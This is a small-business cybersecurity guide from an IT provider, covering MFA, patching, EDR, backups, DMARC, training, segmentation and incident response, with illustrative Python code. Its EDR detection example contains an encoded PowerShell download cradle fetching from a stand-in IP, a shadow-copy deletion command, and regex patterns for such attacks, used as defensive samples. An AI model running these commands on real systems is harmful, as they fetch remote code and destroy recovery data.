01
Turn On Multi-Factor Authentication Everywhere
What It Is
Multi-factor authentication, or MFA, adds a second proof of identity beyond the password. The strongest widely available form in 2026 is a passkey: a FIDO2 credential whose private key never leaves the authenticator and whose signature is bound to the real site origin, so a look-alike phishing page cannot harvest anything it can reuse. Time-based one-time codes from an authenticator app are the next best tier; they defeat password-only attacks, but a real-time phishing proxy can still relay a freshly typed code, so they belong with number-matching prompts and user training. SMS codes are the weakest form, exposed to SIM swap, and should be phased out wherever a stronger option exists.
Why It Matters
Credential theft is the single most common entry point Petronella Technology Group sees in Triangle incident response. An attacker buys or phishes a working username and password, logs in from a residential proxy in the same region so the sign-in looks normal, and owns the account in seconds. MFA breaks that chain. Even a stolen password is useless without the second factor. Microsoft has reported that account takeover risk drops by more than ninety-nine percent when MFA is enabled, and that figure matches what we observe in the field.
How to Implement
- Email first. Microsoft 365 and Google Workspace both support MFA at the tenant level. Turn it on for every user, not just executives.
- Prefer passkeys where the platform supports them. Apple, Google, Microsoft, and most password managers now speak the standard.
- Use an authenticator app such as Microsoft Authenticator, Duo, or 1Password where passkeys are not available. Turn on number matching for push prompts where the app supports it, so a user cannot approve a sign-in they did not start. Avoid SMS as a primary second factor.
- Cover the admin accounts you forget about. Domain registrar, DNS host, payroll, line-of-business cloud apps, and your accounting software all need MFA.
What Petronella Does
For managed clients we enforce MFA through Microsoft Entra Conditional Access or the equivalent in Google Workspace, standardize on passkeys where the vendor supports them, and audit the long tail of SaaS accounts each quarter. Dental practices and small law firms usually have between thirty and seventy SaaS logins hiding in browsers. We inventory them and bring them under unified identity protection.
02
Run a Managed Patch Cadence, Not Just Auto-Update
What It Is
Patch management is the disciplined process of identifying, testing, and deploying security updates to operating systems, browsers, firmware, and business applications. Auto-update is a starting point, not a finish line. It misses third-party apps, firmware on switches and firewalls, server hypervisors, and anything that requires a reboot the user keeps postponing.
Why It Matters
Many of the ransomware cases Petronella Technology Group investigated in 2025 exploited vulnerabilities that had a patch available for months. A defense subcontractor in Apex and a medical billing office in Morrisville were both compromised through unpatched remote access appliances. Regulated industries cannot rely on end users clicking defer. HIPAA, the FTC Safeguards Rule, and CMMC all expect a documented patching program with defined timelines.
How to Implement
- Inventory first. You cannot patch what you do not know about. Document every laptop, server, firewall, switch, printer, and line-of-business app.
- Define a cadence. Critical security patches deploy within seventy-two hours. Non-critical patches deploy on a monthly cycle after staging tests.
- Patch the firmware tier. Firewalls, switches, wireless controllers, storage appliances, and backup servers all ship vulnerabilities that most SMBs never touch.
- Track exceptions. If a legacy medical device or engineering CAD workstation cannot be patched, document the compensating controls and segment it.
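The four steps above produce data that a script can check every week. The following Python is an added example, not Petronella's reporting tool: it evaluates a constructed inventory against the cadence stated above (critical within seventy-two hours, everything else on a monthly cycle, taken here as thirty days) and an exception register, and classifies each pending update as on time, overdue, or covered by a still-valid exception. Asset names, dates and the thirty-day figure are assumptions.

```python
from datetime import date, timedelta

# Cadence from the page: critical within 72 hours, everything else monthly
# (30 days here, an assumption so that every row gets a concrete deadline).
SLA_DAYS = {"critical": 3, "high": 30, "medium": 30, "low": 30}

# Constructed sample: one row per asset and pending (or recently installed) update.
INVENTORY = [
    {"asset": "fw-edge-01", "tier": "firmware", "severity": "critical",
     "released": "2026-03-01", "installed": None},
    {"asset": "hv-01", "tier": "server", "severity": "critical",
     "released": "2026-03-09", "installed": "2026-03-10"},
    {"asset": "ws-frontdesk-07", "tier": "workstation", "severity": "high",
     "released": "2026-02-01", "installed": None},
    {"asset": "ws-lab-02", "tier": "workstation", "severity": "high",
     "released": "2026-03-10", "installed": None},
    {"asset": "xray-panoramic", "tier": "medical-device", "severity": "critical",
     "released": "2026-01-15", "installed": None},
]

# Exception register: anything the vendor will not let you patch needs named
# compensating controls and an expiry, so it is re-examined rather than forgotten.
EXCEPTIONS = {
    "xray-panoramic": {"controls": "isolated VLAN, no internet egress, vendor-only remote access",
                       "expires": "2026-12-31"},
}


def classify(row: dict, exceptions: dict, today: date) -> str:
    """ok / late for installed updates; pending / overdue / excepted / exception-expired otherwise."""
    released = date.fromisoformat(row["released"])
    deadline = released + timedelta(days=SLA_DAYS[row["severity"]])
    if row["installed"]:
        return "ok" if date.fromisoformat(row["installed"]) <= deadline else "late"
    exc = exceptions.get(row["asset"])
    if exc:
        return "excepted" if date.fromisoformat(exc["expires"]) >= today else "exception-expired"
    return "overdue" if today > deadline else "pending"


def compliance_report(inventory: list, exceptions: dict, today: date) -> dict:
    """Status per asset plus counts: the shape a weekly compliance report is built from."""
    status = {row["asset"]: classify(row, exceptions, today) for row in inventory}
    summary = {}
    for s in status.values():
        summary[s] = summary.get(s, 0) + 1
    return {"as_of": today.isoformat(), "status": status, "summary": summary}


if __name__ == "__main__":
    rep = compliance_report(INVENTORY, EXCEPTIONS, date(2026, 3, 12))
    for asset, s in rep["status"].items():
        print(f"{asset:18} {s}")
    print(rep["summary"])
```

The exception branch is the part most patch dashboards lack: an exception without an expiry date quietly becomes a permanent hole.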
What Petronella Does
Our managed IT engagement includes automated patching across workstations, servers, and network gear, with weekly compliance reporting. We stage patches in a controlled group before pushing to the full fleet, and we maintain an exception register for any systems that a vendor restricts from standard patching.
03
Replace Traditional Antivirus With Endpoint Detection and Response
What It Is
Endpoint detection and response, or EDR, monitors every workstation and server for suspicious behavior, not just known malware signatures. Modern EDR platforms combine machine learning models, behavioral analysis, and human-led threat hunting. The best-known names are CrowdStrike, SentinelOne, and Microsoft Defender for Endpoint, though the category is broad. EDR paired with a managed detection and response team becomes MDR, which adds twenty-four hour human oversight.
Why It Matters
Traditional antivirus checks files against a signature database. The early stages of a modern ransomware intrusion often involve no malicious file at all. Attackers use living-off-the-land techniques, abusing PowerShell, Windows Management Instrumentation, and legitimate administrative tools already on the box. Signature antivirus sees nothing. EDR records the behavior, correlates it across the environment, and alerts on the pattern.
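What "records the behavior and alerts on the pattern" looks like in code: an added Python example, not any vendor's detection logic, that runs a few living-off-the-land rules over constructed process-creation events shaped loosely like Sysmon Event ID 1 (parent process, image, command line). It decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text) so the download cradle hidden inside can be matched, flags an Office application or the WMI provider host spawning a script interpreter, and flags shadow-copy deletion. The events, file paths and the IP address in the sample payload are constructed.

```python
import base64
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
CRADLE = re.compile(r"\bIEX\b|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|"
                    r"Net\.WebClient|FromBase64String|Start-BitsTransfer", re.I)
SHADOW = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|"
                    r"bcdedit.*recoveryenabled\s+no", re.I)
# powershell -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_ARG = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_ps(script: str) -> str:
    """What the attacker does: -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmd: str):
    """Return the plaintext behind -EncodedCommand, or None if there is none."""
    m = ENC_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed process-creation events, shaped loosely like Sysmon Event ID 1.
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe report.txt"},
    {"id": 2, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc "
            + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"id": 3, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c vssadmin delete shadows /all /quiet"},
    {"id": 4, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmd": "svchost.exe -k netsvcs"},
]


def analyze(event: dict) -> list:
    """Behavioral rules over one event; returns the findings (empty means nothing matched)."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmd"]
    findings = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(f"office app {parent} spawned script host {image}")
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        findings.append(f"WMI provider host spawned {image} (remote WMI execution)")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(f"encoded PowerShell decodes to: {decoded[:60]}")
        cmd = f"{cmd} {decoded}"   # match the plaintext too, not just the raw command line
    if CRADLE.search(cmd):
        findings.append("download cradle / in-memory execution pattern")
    if SHADOW.search(cmd):
        findings.append("shadow copy deletion, a common ransomware precursor")
    return findings


def triage(events: list) -> dict:
    """Event id -> findings. Correlating across events (same host, same minute) is the EDR's job."""
    return {e["id"]: analyze(e) for e in events}


if __name__ == "__main__":
    for eid, hits in triage(EVENTS).items():
        print(eid, hits or "clean")
```

Nothing here looks at a file hash, which is the point: every process in the sample is a signed Microsoft binary, and only the relationships and arguments give the intrusion away.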
How to Implement
- Deploy EDR on every endpoint, including servers, remote user laptops, and any Mac in the shop. Gaps are where the intrusion hides.
- Pair it with twenty-four hour monitoring. A tool that fires an alert at two in the morning and nobody reads until Monday is not defense, it is archaeology.
- Tune for your environment. Construction companies run software that looks suspicious to a default policy. Medical practices do too. Tuning cuts noise without reducing coverage.
- Integrate with identity. EDR that sees Entra ID sign-in risk in the same console is substantially more useful than EDR that does not.
What Petronella Does
Petronella Technology Group deploys EDR agents across client fleets and layers managed detection and response with our AI-assisted security operations. Our private AI infrastructure triages alerts continuously so that analysts spend their time on real incidents instead of rule-writing, and clients get measurable mean-time-to-detect numbers rather than a dashboard they never log into.
04
Back Up Data on the 3-2-1 Rule and Actually Test Restore
What It Is
The 3-2-1 backup rule means three copies of your data, on two different media types, with at least one copy offsite. The modern extension, often written 3-2-1-1-0, adds one copy that is offline or immutable, meaning write-once storage that ransomware cannot encrypt or delete even with valid credentials, and zero errors on a verified restore. Recovery time objective (RTO) and recovery point objective (RPO) define how quickly you need to be running again and how much data you can afford to lose.
Why It Matters
Ransomware attackers now target backups first. They log in, find the backup console, delete the repositories, then detonate the ransomware. A Raleigh construction firm Petronella Technology Group worked with in 2024 thought it had sixty days of backup. It did, on the same server cluster the attackers owned. The restore took three weeks and cost more than the ransom in downtime. Tested, immutable, offsite backups are the single most important control that keeps a small business from paying a ransom.
How to Implement
- Match the 3-2-1 rule: production data, onsite backup, and cloud or tape copy. Make at least one copy immutable.
- Separate backup credentials from production credentials. The backup admin account should not share identity with the domain admin.
- Test restores quarterly. Pick a random file set, restore it to a lab environment, and confirm usability. A backup that has never been tested is a hope, not a control.
- Protect Microsoft 365 and Google Workspace with a third-party backup. Neither vendor is your backup system for Exchange, OneDrive, SharePoint, or Gmail.
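A restore test needs a pass/fail criterion, not a feeling that "it came back". The following Python is an added example, not Petronella's tooling, of the check behind the third bullet: hash every file at backup time into a manifest, restore into a separate lab path, and compare. It runs end to end in a temporary directory with constructed sample data, once with a clean restore and once with one file corrupted and another missing, so the shape of the report is visible in both cases.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Relative path -> SHA-256 for every file under root. Take this at backup
    time and store it with the backup copy, not on the production server."""
    return {str(p.relative_to(root)).replace("\\", "/"): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_restore(manifest: dict, restored_root: Path) -> dict:
    """Compare a restored tree against the manifest. 'ok' only when nothing is
    missing, nothing differs and nothing unexpected appeared."""
    restored = build_manifest(restored_root)
    missing = sorted(set(manifest) - set(restored))
    extra = sorted(set(restored) - set(manifest))
    changed = sorted(p for p in manifest if p in restored and restored[p] != manifest[p])
    return {"ok": not (missing or extra or changed), "checked": len(manifest),
            "missing": missing, "extra": extra, "changed": changed}


def run_restore_test() -> dict:
    """Constructed end-to-end test: production -> backup copy -> restore -> verify,
    then the same restore with one file corrupted (same size, as an encrypted or
    bit-rotted copy would be) and one file that never came back."""
    work = Path(tempfile.mkdtemp(prefix="restore-test-"))
    try:
        prod = work / "prod"
        (prod / "patients").mkdir(parents=True)
        (prod / "patients" / "schedule.csv").write_text("id,date\n1001,2026-03-12\n")
        (prod / "ledger.db").write_bytes(bytes(range(256)) * 64)
        manifest = build_manifest(prod)

        backup = work / "backup"          # stands in for the offsite / immutable copy
        shutil.copytree(prod, backup)
        good = work / "restore-good"      # restore into a lab path, never over production
        shutil.copytree(backup, good)
        good_result = verify_restore(manifest, good)

        bad = work / "restore-bad"
        shutil.copytree(backup, bad)
        (bad / "ledger.db").write_bytes(b"\x00" * 16384)
        (bad / "patients" / "schedule.csv").unlink()
        bad_result = verify_restore(manifest, bad)
        return {"good": good_result, "bad": bad_result}
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    for name, result in run_restore_test().items():
        print(name, "PASS" if result["ok"] else "FAIL", result)
```

Size and modification time are not enough: the corrupted ledger in the second run has exactly the original size, and only the hash catches it. Keep the manifest with the backup copy; an attacker who owns production can rewrite a manifest stored there.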
What Petronella Does
Backup and disaster recovery is part of every Petronella Technology Group managed engagement. We design against a specific recovery time objective for each client, configure immutable storage, and run quarterly restore tests that produce an auditor-ready report. Dental practices targeting HIPAA and defense subcontractors preparing for a CMMC assessment both use those reports as evidence.
05
Harden Email With SPF, DKIM, DMARC, and AI Phishing Defense
What It Is
Email authentication rests on three DNS-published mechanisms that tell a receiving server who may send on your behalf. Sender Policy Framework (SPF) is a TXT record listing the servers allowed to send for your domain. DomainKeys Identified Mail (DKIM) signs each outgoing message with a private key held by your mail system and publishes the matching public key in DNS so receivers can verify the signature. Domain-based Message Authentication, Reporting, and Conformance (DMARC) tells receivers what to do when neither SPF nor DKIM passes for the domain in the visible From header, and where to send the aggregate reports that show who is sending as you. On top of that, modern email security gateways use AI to detect business email compromise, invoice fraud, and executive impersonation.
Why It Matters
Business email compromise is the highest-dollar fraud category the FBI tracks, and small businesses are disproportionately hit. A single wire fraud can wipe out months of profit. Without DMARC set to quarantine or reject, attackers can spoof your domain from outside and send convincing invoices to your clients. Inbound, a spoofed or look-alike vendor address is a common starting point for payroll and invoice redirection fraud.
How to Implement
- Publish SPF, DKIM, and DMARC records on every domain you send from, including marketing subdomains and any legacy domains.
- Move DMARC to enforcement, starting at p=none for monitoring, then progressing to quarantine, then reject. Review the reports. Most small businesses find shadow email services they forgot.
- Layer an AI email security gateway that inspects language, context, and sender history for business email compromise patterns.
- Train staff on out-of-band verification for any payment change request: call the requester back on a number you already have on file, never one supplied in the email. Craig Petronella spent much of 2025 building AI agent systems that triage suspicious email in real time for clients.
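The aggregate reports DMARC sends you arrive as XML, and "review the reports" in practice means totalling them by sending source. The following Python is an added example, not part of this page or of Petronella's monitoring: it lints a DMARC record and an SPF record for the weak settings that come up most (p=none, no rua address, a pct sample, +all, more than the ten DNS lookups RFC 7208 allows), summarizes a constructed aggregate report in the RFC 7489 layout by source IP, and suggests the next rung of the enforcement ladder. The domain, IPs, counts and the 98 percent pass-rate threshold are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed DMARC aggregate (rua) report in the RFC 7489 Appendix C layout: the
# tenant's own mail server (passing), a marketing tool IT never heard of (failing,
# but legitimate) and an outside spoofer (failing). The report cannot tell the last
# two apart; that is the human review step.
SAMPLE_REPORT = """<feedback>
<report_metadata><org_name>receiver.example</org_name><report_id>1</report_id></report_metadata>
<policy_published><domain>example.com</domain><adkim>r</adkim><aspf>r</aspf><p>none</p><pct>100</pct></policy_published>
<record><row><source_ip>203.0.113.10</source_ip><count>420</count>
<policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated></row>
<identifiers><header_from>example.com</header_from></identifiers></record>
<record><row><source_ip>198.51.100.25</source_ip><count>30</count>
<policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
<identifiers><header_from>example.com</header_from></identifiers></record>
<record><row><source_ip>192.0.2.77</source_ip><count>12</count>
<policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
<identifiers><header_from>example.com</header_from></identifiers></record>
</feedback>"""

LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def parse_tags(txt: str) -> dict:
    """'v=DMARC1; p=none; rua=mailto:x' -> {'v': 'DMARC1', 'p': 'none', 'rua': 'mailto:x'}"""
    pairs = (part.split("=", 1) for part in txt.split(";") if "=" in part)
    return {k.strip().lower(): v.strip() for k, v in pairs}


def dmarc_issues(txt: str) -> list:
    t = parse_tags(txt)
    issues = []
    if t.get("v") != "DMARC1":
        issues.append("not a DMARC record")
    if t.get("p", "none") == "none":
        issues.append("p=none: spoofed mail is still delivered, you are only monitoring")
    if "rua" not in t:
        issues.append("no rua= address: you will never see the aggregate reports")
    if t.get("pct", "100") != "100":
        issues.append(f"pct={t['pct']}: policy applied to only a sample of mail")
    return issues


def spf_issues(txt: str) -> list:
    terms = txt.split()
    issues = []
    if not terms or terms[0].lower() != "v=spf1":
        issues.append("not an SPF record")
    if any(t.lower() in ("+all", "all", "?all") for t in terms):
        issues.append("ends in +all/?all: anyone on the internet may send as you")
    # Each of these mechanisms costs a DNS lookup; RFC 7208 caps the total at 10.
    names = (t.lstrip("+-~?").split(":")[0].split("=")[0].split("/")[0].lower() for t in terms[1:])
    lookups = sum(1 for n in names if n in LOOKUP_TERMS)
    if lookups > 10:
        issues.append(f"{lookups} DNS lookups, over the RFC 7208 limit of 10 (receivers return permerror)")
    return issues


def summarize_report(xml_text: str) -> dict:
    root = ET.fromstring(xml_text)
    sources, total, passed = {}, 0, 0
    for rec in root.iter("record"):
        ip = rec.findtext("row/source_ip")
        n = int(rec.findtext("row/count"))
        ev = rec.find("row/policy_evaluated")
        ok = "pass" in (ev.findtext("dkim"), ev.findtext("spf"))  # either aligned pass is a DMARC pass
        sources[ip] = {"count": n, "dmarc_pass": ok}
        total, passed = total + n, passed + (n if ok else 0)
    return {"policy": root.findtext("policy_published/p"), "total": total,
            "pass_rate": passed / total if total else 0.0, "sources": sources,
            "review": sorted(ip for ip, v in sources.items() if not v["dmarc_pass"])}


def next_step(summary: dict, threshold: float = 0.98) -> str:
    """Enforcement ladder none -> quarantine -> reject. The threshold is an assumption."""
    p = summary["policy"]
    if summary["pass_rate"] < threshold:
        return f"hold at p={p}: identify {len(summary['review'])} failing source(s), add the legitimate ones to SPF/DKIM"
    return {"none": "move to p=quarantine", "quarantine": "move to p=reject"}.get(p, "at p=reject: keep reading reports")


if __name__ == "__main__":
    print(dmarc_issues("v=DMARC1; p=none; rua=mailto:dmarc@example.com"))
    print(spf_issues("v=spf1 include:spf.protection.outlook.com ip4:203.0.113.0/24 +all"))
    s = summarize_report(SAMPLE_REPORT)
    print(f"pass rate {s['pass_rate']:.1%}, sources to review: {s['review']}")
    print(next_step(s))
```

The "review" list is where the forgotten email services surface: the 198.51.100.25 source in the sample is the kind of marketing or ticketing tool that has to be added to SPF or given a DKIM key before the policy moves to quarantine, otherwise its mail is the first thing the new policy breaks.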
What Petronella Does
We publish and maintain DMARC records for managed clients, monitor the aggregate reports, and walk each client up the enforcement ladder. Where appropriate we layer AI-driven phishing defense trained on the client industry. For law firms and CPA offices, we also build a two-person verification workflow for any banking change over a defined threshold.
06
Train the Human Firewall Four Times a Year, Minimum
What It Is
Security awareness training teaches staff to recognize phishing, social engineering, pretexting, smishing, and the business email compromise patterns that target their specific role. Good programs pair short monthly content with periodic simulated phishing and a clear reporting path for suspicious messages. Annual checkbox training is not enough and never was.
Why It Matters
The best technical defenses still lose when a staff member approves an MFA prompt they did not initiate or forwards a W-2 file to a spoofed executive. The goal is not to shame employees, it is to build instinct. A dental office receptionist who pauses on a weird payment email is worth more than an extra firewall.
How to Implement
- Quarterly training at minimum, monthly micro-learning if the platform supports it.
- Realistic simulations. Use templates themed to your industry. Construction firms get fake lien releases and certificate of insurance requests. Medical practices get fake insurance portal lures.
- Frictionless reporting. A one-click report phish button in Outlook or Gmail dramatically improves reporting rates.
- Track trends, not punishment. Use the data to find where training is needed. Individual shaming breaks the reporting culture you need.
What Petronella Does
Petronella Technology Group includes security awareness training and phishing simulation in most managed engagements. Our training academy also hosts role-specific content for HIPAA, CMMC, and general small business awareness. We report on click rates, report rates, and repeat-offender trends each quarter.
07
Segment the Network So a Single Compromise Cannot Spread
What It Is
Network segmentation divides your network into zones so that a device in one zone cannot freely talk to everything in another. A dental office might have separate zones for clinical workstations, front office, guest Wi-Fi, imaging equipment, and an internet-of-things zone for thermostats and cameras. A manufacturer might segment the shop floor from the engineering office. Segmentation is enforced through VLANs, firewall rules, and increasingly through zero-trust network access.
Why It Matters
Flat networks are why one infected workstation becomes a company-wide ransomware event. Once the attacker lands, the next step is lateral movement: scanning for file shares, backup servers, and domain controllers. Segmentation slows that movement down to the point where detection tools can catch it. It also defines the boundaries that a HIPAA risk analysis, CMMC Level 2 system scoping, and most cyber insurance questionnaires ask you to document.
How to Implement
- Start with clear zones. User workstations, servers, printers and IoT, guest, and management.
- Default-deny between zones. Open only the specific ports the business actually needs.
- Isolate IoT ruthlessly. Cameras, thermostats, smart TVs, and the dentist chair controller should never touch the clinical network.
- Document the boundary. Auditors and insurers want a diagram, not a promise.
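The zone list and default-deny rule above can be written down as data and checked before a single VLAN is touched. Here is an added Python example (not a Petronella deliverable) for the dental-office layout the page describes: zones as subnets, an allow-list of flows in the direction connections are opened, an evaluate function that answers "can this device reach that one" with a reason, and a rendering of the same list as an nftables forward chain. Subnets, interface names, the DICOM and file-share ports chosen and the management exception are assumptions.

```python
import ipaddress

# Constructed zone map for a small clinical office; subnets are assumptions.
ZONES = {
    "clinical":     ipaddress.ip_network("10.10.10.0/24"),
    "front_office": ipaddress.ip_network("10.10.20.0/24"),
    "servers":      ipaddress.ip_network("10.10.30.0/24"),
    "imaging":      ipaddress.ip_network("10.10.40.0/24"),
    "iot":          ipaddress.ip_network("10.10.50.0/24"),
    "guest":        ipaddress.ip_network("192.168.100.0/24"),
    "management":   ipaddress.ip_network("10.10.250.0/24"),
}
IFACE = {"clinical": "vlan10", "front_office": "vlan20", "servers": "vlan30", "imaging": "vlan40",
         "iot": "vlan50", "guest": "vlan100", "management": "vlan250", "internet": "wan0"}
ANY = "*"

# The whole inter-zone policy: flows listed in the direction the connection is
# opened. Replies ride on connection tracking; anything not listed is dropped.
ALLOWED = [
    # src zone       dst zone     proto  port  purpose
    ("clinical",     "servers",   "tcp", 445,  "practice-management file share"),
    ("clinical",     "servers",   "tcp", 443,  "internal web apps"),
    ("front_office", "servers",   "tcp", 445,  "file share"),
    ("front_office", "servers",   "tcp", 443,  "internal web apps"),
    ("clinical",     "imaging",   "tcp", 104,  "DICOM to the modality"),
    ("imaging",      "servers",   "tcp", 104,  "DICOM store to PACS"),
    ("clinical",     "internet",  "tcp", 443,  "vendor cloud services"),
    ("front_office", "internet",  "tcp", 443,  "web"),
    ("iot",          "internet",  "tcp", 443,  "camera and thermostat cloud, nothing internal"),
    ("guest",        "internet",  ANY,   ANY,  "guest wi-fi sees only the internet"),
    ("management",   ANY,         "tcp", 22,   "admin SSH from the management VLAN only"),
    ("management",   ANY,         "tcp", 443,  "admin web consoles"),
]


def zone_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "internet"      # anything outside the defined zones


def evaluate(src_ip: str, dst_ip: str, proto: str, port: int) -> tuple:
    """Default deny across zone boundaries: ('allow', why) only for a listed flow."""
    src, dst = zone_of(src_ip), zone_of(dst_ip)
    if src == dst:
        return ("allow", f"same zone ({src}); segmentation governs the boundaries")
    for s, d, p, prt, why in ALLOWED:
        if s == src and d in (dst, ANY) and p in (proto, ANY) and prt in (port, ANY):
            return ("allow", why)
    return ("deny", f"no rule permits {src} -> {dst} {proto}/{port}")


def to_nft(rules=ALLOWED) -> str:
    """Render the allow-list as an nftables forward chain (illustrative rendering)."""
    lines = ["table inet segmentation {", "  chain forward {",
             "    type filter hook forward priority 0; policy drop;",
             "    ct state established,related accept"]
    for s, d, p, prt, why in rules:
        match = [f'iifname "{IFACE[s]}"']
        if d != ANY:
            match.append(f'oifname "{IFACE[d]}"')
        if p != ANY:
            match.append(f"{p} dport {prt}")
        lines.append("    " + " ".join(match) + f' accept comment "{why}"')
    lines += ["  }", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    for flow in [("10.10.50.12", "10.10.10.5", "tcp", 445),     # camera -> clinical share
                 ("10.10.20.8", "10.10.30.10", "tcp", 445),     # front desk -> file server
                 ("10.10.10.5", "10.10.30.10", "tcp", 3389)]:   # RDP is not on the list
        print(flow, evaluate(*flow))
    print(to_nft())
```

The policy table doubles as the diagram auditors ask for: every line carries its business reason, and a flow that nobody can justify in that column is a flow that should not exist.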
What Petronella Does
We redesign networks for segmentation as part of compliance and security engagements. For healthcare clients we build zones that match HIPAA risk analysis boundaries. For defense subcontractors we build CUI enclaves that satisfy CMMC Level 2 scope. Either way the deliverable is a documented, enforced topology rather than a best-guess.
08
Use a Password Manager and Move Toward Zero-Trust Access
What It Is
A password manager is a secure vault that generates, stores, and fills unique passwords for every account. Business-grade options include 1Password Business, Bitwarden Teams, and Keeper. Zero-trust access extends the idea to network resources: instead of a flat VPN that grants the whole network, each application is reached through identity-aware, device-aware access brokers. Every request is verified, regardless of whether the user is in the office or at a coffee shop in Chapel Hill.
Why It Matters
Reused passwords are how credential stuffing attacks win. A password leaked from a retail site three years ago will be tried against your Microsoft 365 tenant tonight. A password manager makes unique, long passwords effortless. Zero-trust access retires the old VPN model that assumes everything inside the perimeter is safe, which is a dangerous assumption once a single laptop is compromised.
How to Implement
- Roll out a business password manager and require all work credentials to live inside it.
- Retire shared passwords. Shared vaults should be the rare exception, auditable and rotation-ready.
- Replace flat VPN with identity-aware access for specific apps, starting with the highest-value systems.
- Enforce device posture. Only managed, patched, EDR-protected devices should reach sensitive systems.
What Petronella Does
We onboard clients to a business password manager, help transition staff from browser-saved passwords, and design zero-trust access paths for cloud apps, remote desktop, and privileged administration. The transition happens in weeks, not months, and users usually report faster sign-ins after, not slower.
09
Write an Incident Response Plan Before You Need It
What It Is
An incident response plan, or IRP, is a short, practical document that describes who does what in the first hours and days after a suspected breach. It names the incident commander, lists outside counsel, forensics, insurance, and regulators, describes communication rules, and spells out decision rights around ransom, notification, and recovery. Regulated businesses have hard clocks: defense contractors under DFARS 252.204-7012 must report a cyber incident to the DoD within seventy-two hours of discovery, HIPAA's Breach Notification Rule allows at most sixty days, and public companies face the SEC's four-business-day Form 8-K deadline once an incident is judged material. CMMC expects documented response procedures. Seventy-two hours arrives fast.
Why It Matters
The worst moment to figure out who calls the lawyer is at four in the morning with encrypted file servers and a ransom note on screen. A thin, tested IRP cuts hours off the response, reduces bad decisions made under stress, and creates the paper trail regulators expect. Cyber insurance carriers increasingly ask to see it before they bind coverage.
How to Implement
- Keep it short. Ten pages is better than fifty if the ten are accurate and current.
- Name people by role, not just title. Who actually has the phone list at three in the morning?
- Preselect vendors. Forensics, outside counsel, public relations, restoration. Rates negotiated in calm are cheaper than rates negotiated in crisis.
- Tabletop it annually. Walk through a scenario in a conference room. Most plans have at least one gap that only surfaces under stress.
What Petronella Does
Our digital forensics and incident response practice builds and tests IRPs, and we are on retainer as the forensics partner for many Triangle clients. Craig Petronella is Digital Forensic Examiner license number 604180 in North Carolina, holds CMMC-RP, CCNA, and CWNE credentials, and has led incident response for ransomware, business email compromise, cryptocurrency theft, and SIM swap cases across the region.
10
Run Vendor Due Diligence on Your MSP and Your Supply Chain
What It Is
Vendor due diligence is the ongoing practice of verifying that the third parties with access to your data or systems meet your security bar. For a small business that includes the managed service provider, the line-of-business SaaS vendors, the billing service, the payroll processor, the cloud backup provider, and anyone with remote access. Credentials worth checking include SOC 2 Type II reports, HIPAA business associate agreements, and CMMC RPO verification for defense-sector vendors.
Why It Matters
Supply chain compromise is the quiet story of the last three years. Attackers target the managed service provider because one compromise gives them access to dozens of downstream clients. The same pattern runs through SaaS vendors, billing companies, and remote-access tools. A small business cannot audit every vendor to enterprise standards, but it can ask pointed questions and verify the answers.
How to Implement
- Inventory every vendor with data access or network access. Most SMBs find forty to eighty.
- Request SOC 2 or equivalent from any vendor touching sensitive data. A vendor that refuses is a signal.
- Verify Cyber AB (formerly CMMC-AB) RPO status for any advisor claiming CMMC experience. The registry is public at cyberab.org.
- Right-size access. Remove vendor accounts that are no longer needed. Audit the rest quarterly.
- Contractually require notification of any incident affecting your data, with defined timelines.
What Petronella Does
Petronella Technology Group is a verified CMMC-AB Registered Provider Organization, RPO number 1449, with the entire advisory team CMMC-RP certified. We publish the credentials clients can verify directly, and we build vendor due diligence programs for clients preparing for HIPAA audits, CMMC assessments, and FTC Safeguards Rule examinations. The list of questions we ask a vendor on our clients' behalf is the same list we answer ourselves.